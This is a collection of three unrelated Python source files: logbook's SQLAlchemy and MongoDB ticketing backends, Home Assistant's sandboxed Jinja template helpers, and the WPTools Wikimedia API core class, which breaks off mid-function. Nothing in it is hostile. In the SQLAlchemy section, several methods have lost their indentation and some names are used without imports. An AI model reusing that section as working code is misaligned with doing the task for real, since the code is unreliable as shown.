the logbook ticketing handler.
`metadata`
an optional SQLAlchemy metadata object for the table creation.
`autocreate_tables`
can be set to `False` to disable the automatic
creation of the logbook tables.
"""
    def setup_backend(self):
        """Build the engine, session factory, and ticket tables.

        Consumes these options: ``uri`` (an engine or a database URI),
        ``metadata`` (optional SQLAlchemy MetaData), ``table_prefix``
        (defaults to ``'logbook_'``), and ``autocreate_tables``.
        """
        from sqlalchemy import create_engine, MetaData
        engine_or_uri = self.options.pop('uri', None)
        metadata = self.options.pop('metadata', None)
        table_prefix = self.options.pop('table_prefix', 'logbook_')
        # Anything exposing execute() is treated as a ready-made engine.
        if hasattr(engine_or_uri, 'execute'):
            self.engine = engine_or_uri
        else:
            # Pool recycle keeps connections from going stale, which happens in MySQL Databases
            # Pool size is tuned for our stack
            self.engine = create_engine(engine_or_uri, convert_unicode=True, pool_recycle=360, pool_size=1000)
        # Create session factory using session maker
        session = sessionmaker()
        # Bind the factory to the engine
        session.configure(bind=self.engine)
        # Scoped session is a thread safe solution for
        # interaction with the Database
        self.session = scoped_session(session)
        if metadata is None:
            metadata = MetaData()
        self.table_prefix = table_prefix
        self.metadata = metadata
        # Define the Table objects first, then optionally create them.
        self.create_tables()
        if self.options.get('autocreate_tables', True):
            self.metadata.create_all(bind=self.engine)
def create_tables(self):
"""Creates the tables required for the handler on the class and
metadata.
"""
import sqlalchemy as db
def table(name, *args, **kwargs):
return db.Table(self.table_prefix + name, self.metadata,
*args, **kwargs)
self.tickets = table('tickets',
db.Column('ticket_id', db.Integer, primary_key=True),
db.Column('record_hash', db.String(40), unique=True),
db.Column('level', db.Integer),
db.Column('channel', db.String(120)),
db.Column('location', db.String(512)),
db.Column('module', db.String(256)),
db.Column('last_occurrence_time', db.DateTime),
db.Column('occurrence_count', db.Integer),
db.Column('solved', db.Boolean),
db.Column('app_id', db.String(80))
)
self.occurrences = table('occurrences',
db.Column('occurrence_id', db.Integer, primary_key=True),
db.Column('ticket_id', db.Integer,
db.ForeignKey(self.table_prefix + 'tickets.ticket_id')),
db.Column('time', db.DateTime),
db.Column('data', db.Text),
db.Column('app_id', db.String(80))
)
def _order(self, q, table, order_by):
if order_by[0] == '-':
return q.order_by(table.c[order_by[1:]].desc())
return q.order_by(table.c[order_by])
def record_ticket(self, record, data, hash, app_id):
"""Records a log record as ticket."""
# Can use the session instead engine.connection and transaction
s = self.session
try:
q = self.tickets.select(self.tickets.c.record_hash == hash)
row = s.execute(q).fetchone()
if row is None:
row = s.execute(self.tickets.insert().values(
record_hash=hash,
level=record.level,
channel=record.channel or u(''),
location=u('%s:%d') % (record.filename, record.lineno),
module=record.module or u('<unknown>'),
occurrence_count=0,
solved=False,
app_id=app_id
))
ticket_id = row.inserted_primary_key[0]
else:
ticket_id = row['ticket_id']
s.execute(self.occurrences.insert()
.values(ticket_id=ticket_id,
time=record.time,
app_id=app_id,
data=json.dumps(data)))
s.execute(self.tickets.update()
.where(self.tickets.c.ticket_id == ticket_id)
.values(occurrence_count=self.tickets.c.occurrence_count + 1,
last_occurrence_time=record.time,
solved=False))
s.commit()
except Exception:
s.rollback()
raise
# Closes the session and removes it from the pool
s.remove()
def count_tickets(self):
"""Returns the number of tickets."""
return self.engine.execute(self.tickets.count()).fetchone()[0]
def get_tickets(self, order_by='-last_occurrence_time', limit=50, offset=0):
"""Selects tickets from the database."""
return [Ticket(self, row) for row in self.engine.execute(
self._order(self.tickets.select(), self.tickets, order_by)
.limit(limit).offset(offset)).fetchall()]
def solve_ticket(self, ticket_id):
"""Marks a ticket as solved."""
self.engine.execute(self.tickets.update()
.where(self.tickets.c.ticket_id == ticket_id)
.values(solved=True))
def delete_ticket(self, ticket_id):
"""Deletes a ticket from the database."""
self.engine.execute(self.occurrences.delete()
.where(self.occurrences.c.ticket_id == ticket_id))
self.engine.execute(self.tickets.delete()
.where(self.tickets.c.ticket_id == ticket_id))
def get_ticket(self, ticket_id):
"""Return a single ticket with all occurrences."""
row = self.engine.execute(self.tickets.select().where(
self.tickets.c.ticket_id == ticket_id)).fetchone()
if row is not None:
return Ticket(self, row)
def get_occurrences(self, ticket, order_by='-time', limit=50, offset=0):
"""Selects occurrences from the database for a ticket."""
return [Occurrence(self, row) for row in
self.engine.execute(self._order(self.occurrences.select()
.where(self.occurrences.c.ticket_id == ticket),
self.occurrences, order_by)
.limit(limit).offset(offset)).fetchall()]
class MongoDBBackend(BackendBase):
    """Implements a backend that writes into a MongoDB database."""

    class _FixedTicketClass(Ticket):
        # Mongo documents carry the id under ``_id``; expose it under the
        # ``ticket_id`` name the rest of the ticketing code expects.
        @property
        def ticket_id(self):
            return self._id

    class _FixedOccurrenceClass(Occurrence):
        def __init__(self, db, row):
            # The serialized record lives in the ``data`` field as JSON.
            self.update_from_dict(json.loads(row['data']))
            self.db = db
            self.time = row['time']
            self.ticket_id = row['ticket_id']
            self.occurrence_id = row['_id']

    # TODO: Update connection setup once PYTHON-160 is solved.
    def setup_backend(self):
        """Connect to MongoDB, pick the database and ensure indexes."""
        from pymongo import ASCENDING, DESCENDING
        from pymongo.connection import Connection

        try:
            from pymongo.uri_parser import parse_uri
        except ImportError:
            # Older pymongo keeps the URI parser in pymongo.connection.
            from pymongo.connection import _parse_uri as parse_uri

        from pymongo.errors import AutoReconnect

        _connection = None
        uri = self.options.pop('uri', u(''))
        _connection_attempts = 0

        parsed_uri = parse_uri(uri, Connection.PORT)

        if type(parsed_uri) is tuple:
            # pymongo < 2.0
            database = parsed_uri[1]
        else:
            # pymongo >= 2.0
            database = parsed_uri['database']

        # Handle auto reconnect signals properly: retry a few times before
        # giving up on the initial connection.
        while _connection_attempts < 5:
            try:
                if _connection is None:
                    _connection = Connection(uri)
                database = _connection[database]
                break
            except AutoReconnect:
                _connection_attempts += 1
                time.sleep(0.1)

        self.database = database

        # setup correct indexes
        database.tickets.ensure_index([('record_hash', ASCENDING)],
                                      unique=True)
        database.tickets.ensure_index([('solved', ASCENDING),
                                       ('level', ASCENDING)])
        database.occurrences.ensure_index([('time', DESCENDING)])

    def _order(self, q, order_by):
        """Apply an order_by spec ('-col' = descending) to a cursor."""
        from pymongo import ASCENDING, DESCENDING
        col = '%s' % (order_by[0] == '-' and order_by[1:] or order_by)
        if order_by[0] == '-':
            return q.sort(col, DESCENDING)
        return q.sort(col, ASCENDING)

    def _oid(self, ticket_id):
        """Coerce a ticket id into a BSON ObjectId."""
        from pymongo.objectid import ObjectId
        return ObjectId(ticket_id)

    def record_ticket(self, record, data, hash, app_id):
        """Records a log record as ticket."""
        db = self.database
        ticket = db.tickets.find_one({'record_hash': hash})
        if not ticket:
            doc = {
                'record_hash': hash,
                'level': record.level,
                'channel': record.channel or u(''),
                'location': u('%s:%d') % (record.filename, record.lineno),
                'module': record.module or u('<unknown>'),
                'occurrence_count': 0,
                'solved': False,
                'app_id': app_id,
            }
            ticket_id = db.tickets.insert(doc)
        else:
            ticket_id = ticket['_id']

        db.tickets.update({'_id': ticket_id}, {
            '$inc': {
                'occurrence_count': 1
            },
            '$set': {
                'last_occurrence_time': record.time,
                'solved': False
            }
        })
        # We store occurrences in a seperate collection so that
        # we can make it a capped collection optionally.
        db.occurrences.insert({
            'ticket_id': self._oid(ticket_id),
            'app_id': app_id,
            'time': record.time,
            'data': json.dumps(data),
        })

    def count_tickets(self):
        """Returns the number of tickets."""
        return self.database.tickets.count()

    def get_tickets(self, order_by='-last_occurrence_time', limit=50,
                    offset=0):
        """Selects tickets from the database."""
        query = (self._order(self.database.tickets.find(), order_by)
                 .limit(limit).skip(offset))
        return [self._FixedTicketClass(self, obj) for obj in query]

    def solve_ticket(self, ticket_id):
        """Marks a ticket as solved."""
        # BUG FIX: use the $set update operator.  An update spec without
        # operators makes MongoDB *replace* the whole ticket document with
        # just {'solved': True}, destroying record_hash, level, counters etc.
        self.database.tickets.update({'_id': self._oid(ticket_id)},
                                     {'$set': {'solved': True}})

    def delete_ticket(self, ticket_id):
        """Deletes a ticket from the database."""
        self.database.occurrences.remove({'ticket_id': self._oid(ticket_id)})
        self.database.tickets.remove({'_id': self._oid(ticket_id)})

    def get_ticket(self, ticket_id):
        """Return a single ticket with all occurrences."""
        ticket = self.database.tickets.find_one({'_id': self._oid(ticket_id)})
        if ticket:
            # BUG FIX: wrap in _FixedTicketClass (as get_tickets does) so
            # the ticket_id property maps to the Mongo ``_id`` field.
            return self._FixedTicketClass(self, ticket)

    def get_occurrences(self, ticket, order_by='-time', limit=50, offset=0):
        """Selects occurrences from the database for a ticket."""
        collection = self.database.occurrences
        occurrences = self._order(collection.find(
            {'ticket_id': self._oid(ticket)}
        ), order_by).limit(limit).skip(offset)
        return [self._FixedOccurrenceClass(self, obj) for obj in occurrences]
class TicketingBaseHandler(Handler, HashingHandlerMixin):
    """Baseclass for ticketing handlers. This can be used to interface
    ticketing systems that do not necessarily provide an interface that
    would be compatible with the :class:`BackendBase` interface.
    """

    def __init__(self, hash_salt, level=NOTSET, filter=None, bubble=False):
        Handler.__init__(self, level, filter, bubble)
        # Salt that is mixed into every record hash (see hash_record_raw).
        self.hash_salt = hash_salt

    def hash_record_raw(self, record):
        """Returns the unique hash of a record."""
        hash = HashingHandlerMixin.hash_record_raw(self, record)
        if self.hash_salt is not None:
            hash_salt = self.hash_salt
            # Encode the salt to bytes before hashing.  Short-circuit keeps
            # this Python 2/3 safe: on Python 3 `not PY2` is True, so the
            # `unicode` name (which only exists on Python 2) is never
            # evaluated; on Python 2 only unicode salts need encoding.
            if not PY2 or isinstance(hash_salt, unicode):
                hash_salt = hash_salt.encode('utf-8')
            # NUL separator prevents salt/payload boundary ambiguity.
            hash.update(b('\x00') + hash_salt)
        return hash
class TicketingHandler(TicketingBaseHandler):
    """A handler that writes log records into a remote database. This
    database can be connected to from different dispatchers which makes
    this a nice setup for web applications::

        from logbook.ticketing import TicketingHandler
        handler = TicketingHandler('sqlite:////tmp/myapp-logs.db')

    :param uri: a backend specific string or object to decide where to log to.
    :param app_id: a string with an optional ID for an application. Can be
                   used to keep multiple application setups apart when logging
                   into the same database.
    :param hash_salt: an optional salt (binary string) for the hashes.
    :param backend: A backend class that implements the proper database
                    handling. Backends available are:
                    :class:`SQLAlchemyBackend`, :class:`MongoDBBackend`.
    """

    #: The default backend that is being used when no backend is specified.
    #: Unless overriden by a subclass this will be the
    #: :class:`SQLAlchemyBackend`.
    default_backend = SQLAlchemyBackend

    def __init__(self, uri, app_id='generic', level=NOTSET,
                 filter=None, bubble=False, hash_salt=None, backend=None,
                 **db_options):
        # Derive a per-application salt when none was supplied.
        if hash_salt is None:
            hash_salt = u('apphash-') + app_id
        TicketingBaseHandler.__init__(self, hash_salt, level, filter, bubble)
        db_options['uri'] = uri
        # Classes are always truthy, so this picks the default backend
        # exactly when `backend` is None.
        self.set_backend(backend or self.default_backend, **db_options)
        self.app_id = app_id

    def set_backend(self, cls, **options):
        """Instantiate *cls* with *options* and install it as backend."""
        self.db = cls(**options)

    def process_record(self, record, hash):
        """Subclasses can override this to tamper with the data dict that
        is sent to the database as JSON.
        """
        return record.to_dict(json_safe=True)

    def record_ticket(self, record, data, hash):
        """Record either a new ticket or a new occurrence for a
        ticket based on the hash.
        """
        self.db.record_ticket(record, data, hash, self.app_id)

    def emit(self, record):
        """Emits a single record and writes it to the database."""
        record_hash = self.hash_record(record)
        record_data = self.process_record(record, record_hash)
        self.record_ticket(record, record_data, record_hash)
| |
"""Template helper methods for rendering strings with HA data."""
from datetime import datetime
import json
import logging
import re
import jinja2
from jinja2.sandbox import ImmutableSandboxedEnvironment
from homeassistant.const import (
STATE_UNKNOWN, ATTR_LATITUDE, ATTR_LONGITUDE, MATCH_ALL)
from homeassistant.core import State
from homeassistant.exceptions import TemplateError
from homeassistant.helpers import location as loc_helper
from homeassistant.loader import get_component
from homeassistant.util import convert, dt as dt_util, location as loc_util
from homeassistant.util.async import run_callback_threadsafe
_LOGGER = logging.getLogger(__name__)
# Sentinel distinguishing "no error_value supplied" from an explicit None.
_SENTINEL = object()
DATE_STR_FORMAT = "%Y-%m-%d %H:%M:%S"

# Templates calling distance()/closest() may touch arbitrary entities, so
# entity extraction falls back to MATCH_ALL when these appear.
_RE_NONE_ENTITIES = re.compile(r"distance\(|closest\(", re.I | re.M)
# Captures entity ids referenced via states.domain.object or as the first
# argument of is_state()/is_state_attr()/states().
_RE_GET_ENTITIES = re.compile(
    r"(?:(?:states\.|(?:is_state|is_state_attr|states)\(.)([\w]+\.[\w]+))",
    re.I | re.M
)
def attach(hass, obj):
    """Recursively attach hass to all template instances in list and dict."""
    if isinstance(obj, list):
        # Recurse into each element of the list.
        for item in obj:
            attach(hass, item)
    elif isinstance(obj, dict):
        # Recurse into the values; keys are never templates.
        for value in obj.values():
            attach(hass, value)
    elif isinstance(obj, Template):
        obj.hass = hass
def extract_entities(template):
    """Extract all entities for state_changed listener from template string.

    Returns MATCH_ALL when the template is None or uses the location
    helpers (distance()/closest()), since those can read any entity.
    """
    if template is None or _RE_NONE_ENTITIES.search(template):
        return MATCH_ALL

    extraction = _RE_GET_ENTITIES.findall(template)
    # Idiom fix: truthiness check instead of len(...) > 0.
    if extraction:
        # Deduplicate the referenced entity ids.
        return list(set(extraction))
    return MATCH_ALL
class Template(object):
    """Class to hold a template and manage caching and rendering."""

    def __init__(self, template, hass=None):
        """Instantiate a Template."""
        if not isinstance(template, str):
            raise TypeError('Expected template to be a string')

        # Raw template source; compilation is deferred to first use.
        self.template = template
        self._compiled_code = None
        self._compiled = None
        self.hass = hass

    def ensure_valid(self):
        """Return if template is valid.

        Raises TemplateError on a syntax error; caches the compiled code.
        """
        if self._compiled_code is not None:
            return

        try:
            self._compiled_code = ENV.compile(self.template)
        except jinja2.exceptions.TemplateSyntaxError as err:
            raise TemplateError(err)

    def extract_entities(self):
        """Extract all entities for state_changed listener."""
        return extract_entities(self.template)

    def render(self, variables=None, **kwargs):
        """Render given template.

        Thread-safe blocking wrapper around async_render.
        """
        if variables is not None:
            kwargs.update(variables)

        return run_callback_threadsafe(
            self.hass.loop, self.async_render, kwargs).result()

    def async_render(self, variables=None, **kwargs):
        """Render given template.

        This method must be run in the event loop.
        """
        self._ensure_compiled()

        if variables is not None:
            kwargs.update(variables)

        try:
            return self._compiled.render(kwargs).strip()
        except jinja2.TemplateError as err:
            raise TemplateError(err)

    def render_with_possible_json_value(self, value, error_value=_SENTINEL):
        """Render template with value exposed.

        If valid JSON will expose value_json too.

        Thread-safe blocking wrapper around the async variant.
        """
        return run_callback_threadsafe(
            self.hass.loop, self.async_render_with_possible_json_value, value,
            error_value).result()

    # pylint: disable=invalid-name
    def async_render_with_possible_json_value(self, value,
                                              error_value=_SENTINEL):
        """Render template with value exposed.

        If valid JSON will expose value_json too.

        This method must be run in the event loop.
        """
        self._ensure_compiled()

        variables = {
            'value': value
        }
        try:
            variables['value_json'] = json.loads(value)
        except ValueError:
            # Not JSON - render with only `value` available.
            pass

        try:
            return self._compiled.render(variables).strip()
        except jinja2.TemplateError as ex:
            _LOGGER.error('Error parsing value: %s (value: %s, template: %s)',
                          ex, value, self.template)
            # On render failure return the raw value unless the caller
            # supplied an explicit error_value.
            return value if error_value is _SENTINEL else error_value

    def _ensure_compiled(self):
        """Bind a template to a specific hass instance."""
        if self._compiled is not None:
            return

        self.ensure_valid()

        assert self.hass is not None, 'hass variable not set on template'

        # Expose the HA helper globals to the compiled template.
        location_methods = LocationMethods(self.hass)
        global_vars = ENV.make_globals({
            'closest': location_methods.closest,
            'distance': location_methods.distance,
            'is_state': self.hass.states.is_state,
            'is_state_attr': self.hass.states.is_state_attr,
            'states': AllStates(self.hass),
        })

        self._compiled = jinja2.Template.from_code(
            ENV, self._compiled_code, global_vars, None)

        return self._compiled

    def __eq__(self, other):
        """Compare template with another."""
        # NOTE(review): __eq__ without __hash__ makes instances unhashable
        # on Python 3 - confirm callers never put templates in sets/dicts.
        return (self.__class__ == other.__class__ and
                self.template == other.template and
                self.hass == other.hass)
class AllStates(object):
    """Class to expose all HA states as attributes."""

    def __init__(self, hass):
        """Initialize all states."""
        self._hass = hass

    def __getattr__(self, name):
        """Return the domain state."""
        return DomainStates(self._hass, name)

    def __iter__(self):
        """Return all states."""
        all_states = self._hass.states.async_all()
        return iter(sorted(all_states, key=lambda s: s.entity_id))

    def __call__(self, entity_id):
        """Return the states."""
        state = self._hass.states.get(entity_id)
        if state is None:
            return STATE_UNKNOWN
        return state.state
class DomainStates(object):
    """Class to expose a specific HA domain as attributes."""

    def __init__(self, hass, domain):
        """Initialize the domain states."""
        self._hass = hass
        self._domain = domain

    def __getattr__(self, name):
        """Return the states."""
        entity_id = '{}.{}'.format(self._domain, name)
        return self._hass.states.get(entity_id)

    def __iter__(self):
        """Return the iteration over all the states."""
        matching = [state for state in self._hass.states.async_all()
                    if state.domain == self._domain]
        matching.sort(key=lambda state: state.entity_id)
        return iter(matching)
class LocationMethods(object):
    """Class to expose distance helpers to templates."""

    def __init__(self, hass):
        """Initialize the distance helpers."""
        self._hass = hass

    def closest(self, *args):
        """Find closest entity.

        Closest to home:
            closest(states)
            closest(states.device_tracker)
            closest('group.children')
            closest(states.group.children)

        Closest to a point:
            closest(23.456, 23.456, 'group.children')
            closest('zone.school', 'group.children')
            closest(states.zone.school, 'group.children')
        """
        if len(args) == 1:
            # closest(entities): measure from the configured home location.
            latitude = self._hass.config.latitude
            longitude = self._hass.config.longitude
            entities = args[0]

        elif len(args) == 2:
            # closest(point_state, entities): measure from a state's
            # location attributes.
            point_state = self._resolve_state(args[0])

            if point_state is None:
                _LOGGER.warning('Closest:Unable to find state %s', args[0])
                return None
            elif not loc_helper.has_location(point_state):
                _LOGGER.warning(
                    'Closest:State does not contain valid location: %s',
                    point_state)
                return None

            latitude = point_state.attributes.get(ATTR_LATITUDE)
            longitude = point_state.attributes.get(ATTR_LONGITUDE)

            entities = args[1]

        else:
            # closest(lat, lon, entities): measure from raw coordinates.
            latitude = convert(args[0], float)
            longitude = convert(args[1], float)

            if latitude is None or longitude is None:
                _LOGGER.warning(
                    'Closest:Received invalid coordinates: %s, %s',
                    args[0], args[1])
                return None

            entities = args[2]

        if isinstance(entities, (AllStates, DomainStates)):
            states = list(entities)
        else:
            if isinstance(entities, State):
                gr_entity_id = entities.entity_id
            else:
                gr_entity_id = str(entities)

            # Expand a group entity id into the states of its members.
            group = get_component('group')
            states = [self._hass.states.get(entity_id) for entity_id
                      in group.expand_entity_ids(self._hass, [gr_entity_id])]

        return loc_helper.closest(latitude, longitude, states)

    def distance(self, *args):
        """Calculate distance.

        Will calculate distance from home to a point or between points.
        Points can be passed in using state objects or lat/lng coordinates.
        """
        locations = []

        to_process = list(args)

        while to_process:
            value = to_process.pop(0)

            if isinstance(value, State):
                # State object: read the location from its attributes.
                latitude = value.attributes.get(ATTR_LATITUDE)
                longitude = value.attributes.get(ATTR_LONGITUDE)

                if latitude is None or longitude is None:
                    _LOGGER.warning(
                        'Distance:State does not contains a location: %s',
                        value)
                    return None

            else:
                # We expect this and next value to be lat&lng
                if not to_process:
                    _LOGGER.warning(
                        'Distance:Expected latitude and longitude, got %s',
                        value)
                    return None

                value_2 = to_process.pop(0)
                latitude = convert(value, float)
                longitude = convert(value_2, float)

                if latitude is None or longitude is None:
                    _LOGGER.warning('Distance:Unable to process latitude and '
                                    'longitude: %s, %s', value, value_2)
                    return None

            locations.append((latitude, longitude))

        if len(locations) == 1:
            # Single point: distance from the configured home location.
            return self._hass.config.distance(*locations[0])

        # Otherwise: distance between the first two points, converted from
        # meters into the configured unit system.  Tuple concatenation
        # (locations[0] + locations[1]) yields (lat1, lon1, lat2, lon2).
        return self._hass.config.units.length(
            loc_util.distance(*locations[0] + locations[1]), 'm')

    def _resolve_state(self, entity_id_or_state):
        """Return the State for a State object or an entity-id string."""
        if isinstance(entity_id_or_state, State):
            return entity_id_or_state
        elif isinstance(entity_id_or_state, str):
            return self._hass.states.get(entity_id_or_state)
        return None
def forgiving_round(value, precision=0):
    """Rounding filter that accepts strings."""
    try:
        rounded = round(float(value), precision)
    except (ValueError, TypeError):
        # Value could not be converted to float - pass it through untouched.
        return value
    # With zero precision return an int, mirroring template expectations.
    if precision == 0:
        return int(rounded)
    return rounded
def multiply(value, amount):
    """Filter to convert value to float and multiply it."""
    try:
        factor = float(value)
    except (ValueError, TypeError):
        # Not numeric - return the input unchanged.
        return value
    return factor * amount
def timestamp_custom(value, date_format=DATE_STR_FORMAT, local=True):
    """Filter to convert given timestamp to format."""
    try:
        moment = dt_util.utc_from_timestamp(value)
        if local:
            moment = dt_util.as_local(moment)
        return moment.strftime(date_format)
    except (ValueError, TypeError):
        # Unconvertible input is passed through untouched.
        return value
def timestamp_local(value):
    """Filter to convert given timestamp to local date/time."""
    try:
        moment = dt_util.utc_from_timestamp(value)
        return dt_util.as_local(moment).strftime(DATE_STR_FORMAT)
    except (ValueError, TypeError):
        # Unconvertible input is passed through untouched.
        return value
def timestamp_utc(value):
    """Filter to convert given timestamp to UTC date/time."""
    try:
        moment = dt_util.utc_from_timestamp(value)
        return moment.strftime(DATE_STR_FORMAT)
    except (ValueError, TypeError):
        # Unconvertible input is passed through untouched.
        return value
def strptime(string, fmt):
    """Parse a time string to datetime."""
    try:
        parsed = datetime.strptime(string, fmt)
    except (ValueError, AttributeError):
        # ValueError: string does not match fmt.  Either way, hand the
        # original input back unchanged.
        return string
    return parsed
def fail_when_undefined(value):
    """Filter to force a failure when the value is undefined."""
    if isinstance(value, jinja2.Undefined):
        # Calling an Undefined instance raises jinja2's UndefinedError,
        # aborting the render instead of silently emitting nothing.
        value()
    return value
def forgiving_float(value):
    """Try to convert value to a float."""
    try:
        result = float(value)
    except (ValueError, TypeError):
        # Not convertible - hand back the original value.
        return value
    return result
class TemplateEnvironment(ImmutableSandboxedEnvironment):
    """The Home Assistant template environment."""

    def is_safe_callable(self, obj):
        """Test if callback is safe.

        AllStates instances are callable (``states('domain.object')``),
        so explicitly allow them inside the sandbox.
        """
        return isinstance(obj, AllStates) or super().is_safe_callable(obj)
# Shared sandboxed environment used to compile every Template instance.
ENV = TemplateEnvironment()
# Filters usable as `value | name(...)` in templates.
ENV.filters['round'] = forgiving_round
ENV.filters['multiply'] = multiply
ENV.filters['timestamp_custom'] = timestamp_custom
ENV.filters['timestamp_local'] = timestamp_local
ENV.filters['timestamp_utc'] = timestamp_utc
ENV.filters['is_defined'] = fail_when_undefined
ENV.filters['max'] = max
ENV.filters['min'] = min
# Globals callable directly from template expressions.
ENV.globals['float'] = forgiving_float
ENV.globals['now'] = dt_util.now
ENV.globals['utcnow'] = dt_util.utcnow
ENV.globals['as_timestamp'] = dt_util.as_timestamp
ENV.globals['relative_time'] = dt_util.get_age
ENV.globals['strptime'] = strptime
| |
# -*- coding:utf-8 -*-
"""
WPTools core module
~~~~~~~~~~~~~~~~~~~
Support for accessing Wikimedia foundation APIs.
"""
from time import sleep
import urllib.parse
from wptools.query import WPToolsQuery
from . import utils
import requests
class WPTools(object):
    """
    WPtools (abstract) core class
    """

    # Seconds to sleep between successive API requests.
    REQUEST_DELAY = 0
    # Hard cap on API requests per instance (see _get).
    REQUEST_LIMIT = 50

    cache = None
    data = None
    flags = None
    params = None

    def __init__(self, *args, **kwargs):
        """
        Abstract initialization for...
        - wptools.page
        - wptools.category
        - wptools.restbase
        - wptools.wikidata
        """
        self.cache = {}
        self.data = {}

        self.flags = {
            'silent': kwargs.get('silent') or False,
            'verbose': kwargs.get('verbose') or False
        }

        self.params = {
            'lang': kwargs.get('lang') or 'en',
        }

        if len(args) > 0 and args[0]:  # first positional arg is title
            self.params.update({'title': args[0]})

        if kwargs.get('skip'):
            self.flags.update({'skip': kwargs.get('skip')})

        if kwargs.get('variant'):
            self.params.update({'variant': kwargs.get('variant')})

        if kwargs.get('wiki'):
            self.params.update({'wiki': kwargs.get('wiki')})

    def _build_showstr(self, seed):
        """
        Returns show() display string for data attribute
        """
        output = ["%s (%s) data" % (seed, self.params['lang'])]

        output.append('{')

        maxwidth = WPToolsQuery.MAXWIDTH

        for item in sorted(self.data):

            if self.data[item] is None:
                continue

            prefix = item
            value = self.data[item]

            # Summarize containers as "<type(len)>" plus joined contents.
            if isinstance(value, dict):
                prefix = "%s: <dict(%d)>" % (prefix, len(value))
                value = ', '.join(value.keys())
            elif isinstance(value, int):
                prefix = "%s:" % prefix
                # pageids are shown raw; other ints get thousands commas.
                if 'pageid' not in prefix:
                    value = "{:,}".format(value)
            elif isinstance(value, list):
                prefix = "%s: <list(%d)>" % (prefix, len(value))
                value = ', '.join((safestr(x) for x in value if x))
            elif isinstance(value, tuple):
                prefix = "%s: <tuple(%d)>" % (prefix, len(value))
                value = ', '.join((safestr(x) for x in value if x))
            elif utils.is_text(value):
                value = value.strip().replace('\n', '')
                # Long strings are labeled with their length instead.
                if len(value) > (maxwidth - len(prefix)):
                    prefix = "%s: <str(%d)>" % (prefix, len(value))
                else:
                    prefix = "%s:" % prefix

            output.append(" %s %s" % (prefix, value))

        output.append('}')

        return output

    def _continue_params(self):
        """
        Returns query string fragment continue parameters
        """
        if not self.data.get('continue'):
            return

        params = []
        for item in self.data['continue']:
            params.append("&%s=%s" % (item, urllib.parse.quote_plus(self.data['continue'][item])))

        return ''.join(params)

    def _handle_continuations(self, response, cache_key):
        """
        Select continue params and clear cache or last continue params
        """
        rcontinue = response.get('continue')
        # Only these continuation flags are honored.
        listen = ['blcontinue', 'cmcontinue', 'plcontinue']

        cparams = {}
        if rcontinue:
            for flag in listen:
                if rcontinue.get(flag):
                    cparams[flag] = rcontinue.get(flag)

        if cparams:
            # More pages to fetch: remember params and drop the cached
            # response so the same action can be requested again.
            self.data['continue'] = cparams
            del self.cache[cache_key]
        else:  # no more continuations
            if 'continue' in self.data:
                del self.data['continue']

    def _get(self, action, show, proxy, timeout):
        """
        make HTTP request and cache response

        NOTE(review): the *proxy* and *timeout* parameters are accepted
        but never used in this body - confirm whether they should be
        forwarded to the HTTP call.
        """
        silent = self.flags['silent']

        if action in self.cache:
            if action != 'imageinfo' and action != 'labels':
                utils.stderr("+ %s results in cache" % action, silent)
            return
        else:
            self.cache[action] = {}

        if self.flags.get('skip') and action in self.flags['skip']:
            if not self.flags['silent']:
                utils.stderr("+ skipping %s" % action)
            return

        if 'requests' not in self.data:
            self.data['requests'] = []

        # NOTE(review): raising StopIteration would be converted to
        # RuntimeError inside a generator (PEP 479) - confirm callers.
        if len(self.data['requests']) >= self.REQUEST_LIMIT:
            raise StopIteration("Hit REQUEST_LIMIT = %d" % self.REQUEST_LIMIT)

        if self.data['requests'] and self.REQUEST_DELAY:
            utils.stderr("REQUEST_DELAY = %d seconds" % self.REQUEST_DELAY)
            sleep(self.REQUEST_DELAY)

        # make the request
        qobj = WPToolsQuery(lang=self.params['lang'],
                            variant=self.params.get('variant'),
                            wiki=self.params.get('wiki'),
                            endpoint=self.params.get('endpoint'))
        qstr = self._query(action, qobj)
        # NOTE(review): requests.get's second positional argument is
        # `params`; passing qobj.status here looks suspicious - confirm
        # the intended call signature.
        response = requests.get(qstr, qobj.status)

        self.cache[action]['query'] = qstr
        self.cache[action]['response'] = response.json()

        self.data['requests'].append(action)

        self._set_data(action)

        if show and not self.flags.get('silent'):
            self.show()

    def _load_response(self, action):
        """
        returns API response from cache or raises ValueError
        """
        # Strip the format param so error messages show a readable URL.
        _query = self.cache[action]['query'].replace('&format=json', '')
        response = self.cache[action]['response']

        if not response:
            raise ValueError("Empty response: %s" % self.params)

        data = response

        # Accumulate API warnings across requests.
        if data.get('warnings'):
            if 'WARNINGS' in self.data:
                self.data['WARNINGS'].update(data['warnings'])
            else:
                self.data['WARNINGS'] = data['warnings']

        if data.get('error'):
            utils.stderr("API error: %s" % data.get('error'))
            raise LookupError(_query)

        # A "missing" page in a query response means the title was not found.
        if 'query' in action and data.get('query'):
            if data['query'].get('pages'):
                if data['query']['pages'][0].get('missing'):
                    raise LookupError(_query)

        if action == 'parse' and not data.get('parse'):
            raise LookupError(_query)

        if action == 'wikidata':
            handle_wikidata_errors(data, _query)

        return data

    def _query(self, action, qobj):
        """
        Abstract method that returns WPToolsQuery string
        """
        raise NotImplementedError("A subclass must implement this method.")

    def _set_data(self, action):
        """
        Abstract method to capture API response data
        """
        raise NotImplementedError("A subclass must implement this method.")

    def info(self, action=None):
        """
        returns cached request info for given action,
        or list of cached actions
        """
        if action in self.cache:
            return self.cache[action]['info']
        return self.cache.keys() or None

    def query(self, action=None):
        """
        returns cached query string (without &format=json) for given action,
        or list of cached actions
        """
        if action in self.cache:
            return self.cache[action]['query'].replace('&format=json', '')
        return self.cache.keys() or None

    def response(self, action=None):
        """
        returns cached response (as dict) for given action,
        or list of cached actions
        """
        if action in self.cache:
            return self.cache[action]['response']
        return self.cache.keys() or None

    def show(self):
        """
        Pretty-print instance data
        """
        if not self.data:
            return

        # Suppress output while continuation requests are still pending.
        if self.data.get('continue'):
            return

        ptitle = self.params.get('title')
        dtitle = self.data.get('title')
        pageid = self.params.get('pageid')

        seed = dtitle or ptitle or pageid
        if utils.is_text(seed):
            seed = seed.replace('_', ' ')

        prettyprint(self._build_showstr(seed))
def handle_wikidata_errors(data, query):
    """
    Raises LookupError if wikidata error found
    """
    entities = data.get('entities')
    if not entities or '-1' in entities:
        # No entities at all, or the API's "not found" marker entity.
        raise LookupError(query)
    first = list(entities.values())[0]
    if 'missing' in first:
        # The item existed once but has since been deleted.
        raise LookupError(
            "wikidata item %s has been deleted" % first['id'])
def prettyprint(datastr):
    """
    Print page data strings to stderr
    """
    maxwidth = WPToolsQuery.MAXWIDTH
    # Width left for content once the right padding and ellipsis fit.
    extent = maxwidth - (WPToolsQuery.RPAD + 2)
    for line in datastr:
        if len(line) >= maxwidth:
